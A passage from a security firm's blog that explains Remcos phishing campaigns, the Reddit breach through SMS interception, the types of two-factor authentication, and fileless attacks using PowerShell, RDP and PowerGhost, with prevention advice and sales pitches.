said, are located in Germany and Holland. The Remcos that’s installed into the victims’ computers in the Iceland phishing attack also comes with a fact checker that checks if the victims are accessing the largest online banks in Iceland. According to security researcher MalwareHunterTeam, this fact-checking capability is a selective keylogger feature of Remcos. According to researchers at Cisco Talos, Remcos was also used to attack international news agencies, diesel equipment manufacturers operating within the maritime and energy sector, and HVAC service providers operating within the energy sector. "Since Remcos is advertised and sold on numerous hacking-related forums, we believe it is likely that multiple unrelated actors are leveraging this malware in their attacks using a variety of different methods to infect systems,” researchers at Cisco Talos said. Similar to the phishing attack targetting Icelanders, the cyberattacks mentioned by Cisco Talos started with a phishing email, purportedly coming from a government agency and comes with an attached document. Embedded into the attached document is a small executable. “The extracted executable is simple and functions as the downloader for the Remcos malware,” Cisco Talos researchers said. “It is a very basic program and is used to retrieve Remcos from an attacker-controlled server and execute it, thus infecting the system.” Prevention While the company behind Remcos claims that its software is meant for legitimate use, data in the wild, including the cyber incidents reported by Cyren and Cisco Talos demonstrate that Remcos is being used by malicious actors. Remcos is a powerful remote access tool that’s being regularly modified to include new functionalities to remotely control and monitor any Windows operating system. Make sure that your organization is implementing security measures to combat Remcos and another phishing modus operandi. When you need help, we are a phone call away. Connect with ustoday and protect your business. Reddit Data Breach Highlights Weaknesses of SMS-Based 2-Factor AuthenticationReddit recently announced that it succumbed to a cyberattack, an attack that was born out of the weaknesses inherent to SMS-based 2-factor authentication (2FA). Reddit, in a statement, said that an attacker managed to access the company’s complete copy of a database backup containing user data starting from the site’s launch in 2005 up to May 2007. The data accessed during this period include passwords of users and public and private messages. The company added that email address of current users, source code, internal logs, configuration files and other employee workspace files have also been accessed by the attacker. While acknowledging that the recent cyberattack was a serious attack, according to Reddit, the attacker didn’t do much damage to the site itself as the attacker only gained read-only access, not write access to Reddit systems. Reddit said that the attacker entered the company’s systems as a result of the weaknesses inherent to SMS-based 2FA. “Already having our primary access points for code and infrastructure behind strong authentication requiring two factor authentication (2FA), we learned that SMS-based authentication is not nearly as secure as we would hope, and the main attack was via SMS intercept,” Reddit said. What Is Two-Factor Authentication (2FA)?Two-Factor Authentication, also known as 2FA, is an added layer of protection that’s meant to ensure that security of online accounts goes further than a username and a password. Here are the 3 most common types of 2FA or security keys for securing your online accounts: 1. SMS-Based 2FAIn SMS-based 2FA, whenever you log-in to your online account, after entering your username and password, a verification code will be sent in a form of an SMS message to your mobile phone. Once the correct verification code is entered after entering the correct username and password, you’ll then gain access to your online account. In the case of the Reddit cyberattack, it wasn’t disclosed how the attacker carried out the "SMS intercept". The publicly known scenario for SMS intercept is via SIM swapping, also known as SIM hijacking. In SIM swapping, an attacker calls a cell phone carrier’s tech support pretending to be the target victim and claims that the target’s SIM card is lost. The attacker then requests that the phone number of the target be transferred (also known as ported) to a new SIM card that the attacker already owns. The attacker in this scam convinces the phone carrier’s tech support to make the necessary transfer of phone number to a new SIM card by providing the target’s personally identifiable information, including Social Security Number or home address, details that are available online after many data breaches from other companies in the past. Once an attacker convinces the phone carrier’s tech support for the SIM-swap, it’s game over for the target. The immediate effect is that the target loses phone service and any 2FA verification code delivered via SMS is sent to the new SIM card that the attacker controls. 2. App-Based 2FAIn app-based 2FA, you need to download an app, such as Google Authenticatoror Authy, to your mobile phone or PC. Once installed and configured, you can get the verification code, after entering your correct username and password, through your device. Unlike the SMS-based 2FA, you can still get the verification code when your phone service gets shut off. The downside of app-based 2FA is that the verification code needs to be entered into the same login page on a website along with the username and password. This allows cyberattackers to subvert the username, password and verification code by cyberattacks such as phishing and man-in-the-middle. In a phishing attack, a user is duped into revealing sensitive data, including username and password. In man-in-the-middle attack, the attacker positions himself in a conversation between a user and an application, making it appear as if a normal exchange of information is conducted. 3. Hardware-Based 2FAHardware-based 2FA, also known as physical security key, comes in the form of a USB device. Login process can be completed by inserting the USB device to the USB port and by pressing a button in the USB device, eliminating the need for retyping verification codes. This is also meant to verify that you’re not a remote malicious hacker. Unlike the SMS-based 2FA and app-based 2FA, in hardware-based 2FA, you don’t need your mobile phone to access your online accounts. Yubico, the most popular maker of hardware-based security keys, sells its basic model for only $20. Last month, Googleannounced that its own hardware-based security keys called “Titan Security Keys” are available to Google Cloud customers and will soon be available for anyone to purchase on the Google Store. Last month also, Google told cybersecurity journalist Brian Krebsthat since early 2017, more than 85,000 of its employees have been using physical security keys. Since then, the tech giant said that 85,000+ of its employees haven’t fallen prey to phishing attacks on their work-related accounts. Google said that Titan Security Keys enhanced protection against phishing as the “2-step verification with a security key uses cryptography to provide two-way verification: it makes sure you're logging into the service you originally registered the security key with, and the service verifies that it's the correct security key as well”. The downside of having physical security keys is that it’s a security risk to carry these devices around as once attackers get hold of them, it’s also game over for the targets. Physical security keys, therefore, have to be kept in a safe and secure place. When you have questions concerning your options of better protecting mission critical data, our experts are a phone call away. Call today: 1.888.900.DRIZ (3749)Fileless Cyberattacks: They're Getting More Widespread and They're WorkingReports from Ponemon Institute and McAfee Labs have shown that fileless cyberattacks are getting more widespread and they're working. What Are Fileless Cyberattacks?Fileless cyberattacks, also known as zero-footprint attacks, refer to cyberattacks that are meant to evade detection by avoiding to install at one stage or another malicious software (malware) on the victims’ computers. McAfee Labsreported that there’s a significant shift by some cyberattackers toward exploiting trusted Microsoft’s proprietary programs, rather than installing external malware, to attack computers or office computer networks. In the Ponemon Institute’s study “The 2017 State of Endpoint Security Risk”, researchers found that 77% of successful cyberattacks in 2017 used fileless techniques. The study found that fileless attacks are almost 10 times more likely to succeed than file-based attacks. The terms “fileless” and “zero-footprint” are misnomers. Fileless cyberattacks don’t mean that they’re exclusively fileless at every stage. For instance, the attack may start with the opening of a malicious file to a spam email and once the infection starts though, the attackers may shift to fileless techniques. Attackers can also gain access to victims' computers by compromising the victims' computers filelessly at the beginning of the attacks, for instance, by exploiting a security vulnerability that's unpatched and then once access is achieved, external malware is then installed. Fileless cyberattacks aren’t also necessarily “zero-footprint” because fileless cyberattacks do leave traces on the victims’ computers if one knows where to look. There’s, however, justification to the name “fileless cyberattacks” as these attacks don’t exhibit the usual symptoms normally associated with malware infection on the computer disk. As they’re asymptomatic, they’re hard to detect and as such, traditional anti-virus solutions can’t detect them. Instead of installing the malware into the computer disk, what a fileless attack does is embed the malware in scripts or install the malware into the computer memory and never gets copied to the disk, thereby bypassing endpoint security measures such as anti-virus, which typically rely on file input/output to detect threats. Examples of Fileless CyberattacksBelow are examples by which attackers infect victims’ computers filelessly: 1. Fileless Cyberattacks via Microsoft’s Windows PowerShellOne of the ways by which attackers infect victims’ computers filelessly is via Microsoft’s Windows PowerShell. Microsoft’s Windows PowerShell is Microsoft’s task automation and configuration management framework. Available on Windows 7 onward, Microsoft PowerShell allows full access to Microsoft COM (Component Object Model) and Microsoft Windows Management Instrumentation (WMI). Attackers can access Windows features using Microsoft PowerShell. One preventive measure in protecting Microsoft PowerShell from fileless cyberattacks is by setting it to "Restricted". According to McAfee Labs, attackers can easily get around this restriction by performing “remote execution of a script by directly executing it in memory to bypass endpoint security.” System administrators bypass the Microsoft’s Windows PowerShell restriction, in the same manner, to execute commands on office computer networks from a remote location via the internet. 2. Fileless Cyberattacks via Microsoft’s Remote Desktop Protocol (RDP)Another way by which attackers infect victims’ computers filelessly is via Microsoft’s Remote Desktop Protocol. Microsoft’s Remote Desktop Protocol, just like Microsoft’s Windows PowerShell, is a proprietary software developed by Microsoft. And just like PowerShell which is primarily used by system administrators, Remote Desktop Protocol is also used by systems administrators to access other computers or office computer networks from a remote location via the internet. Attackers gain access to victims' computers via Microsoft’s Remote Desktop Protocol by simply guessing their way past weak passwords or by using popular password cracking tools. McAfee Labsreported that thousands of these Remote Desktop Protocol login details (specifically for Windows XP through Windows 10 and Windows 2008 and 2012 Server) are sold online between $3 to $19. Once attackers gain access to your organization’s computer network via Remote Desktop Protocol, they can do anything with it such as install any malware of their choice. In both fileless cyberattacks via Microsoft Windows PowerShell and Microsoft Remote Desktop Protocol, once attackers gain access into victims’ computers, they’re viewed as system administrators, masking the identity of the attackers, allowing them to hide in plain sight. 3. PowerGhostPowerGhost is a cryptocurrency mining malware – a malicious software that hijacks the processing power of victims’ computers. Kaspersky Lab first identified this malware. This malware spreads across large corporate networks infecting both workstations and servers by using a number of fileless techniques, including Mimikatz, a hacking tool designed to siphon a Windows user's password out of the computer's memory. PowerGhost propagates itself across the local network by launching a copy of itself via Microsoft’s Windows PowerShell and via the now-notorious EternalBlue exploit – a spy tool believed to be developed by the US National Security Agency (NSA) and leaked by the hacking group Shadow Brokers in April 2017. On March 14, 2017, a month before Shadow Brokers leaked the EternalBlue code, Microsoftreleased a security update or patch fixing the security vulnerability exploited by EternalBlue. Prevention against Fileless CyberattacksAs shown in the above-mentioned examples, attackers use a number of techniques for fileless attacks. Here are some of the preventive measures against fileless attacks:
By keeping your software up-to-date, your organization’s computer network won’t be vulnerable against EternalBlue exploit.
When you are looking to boost staff awareness and better protect your applications and infrastructure, get in touchand we will be happy to help. |
AuthorSteve E. Driz, I.S.P., ITCP Archives
March 2024
Categories
All
|
1/10/2019
0 Comments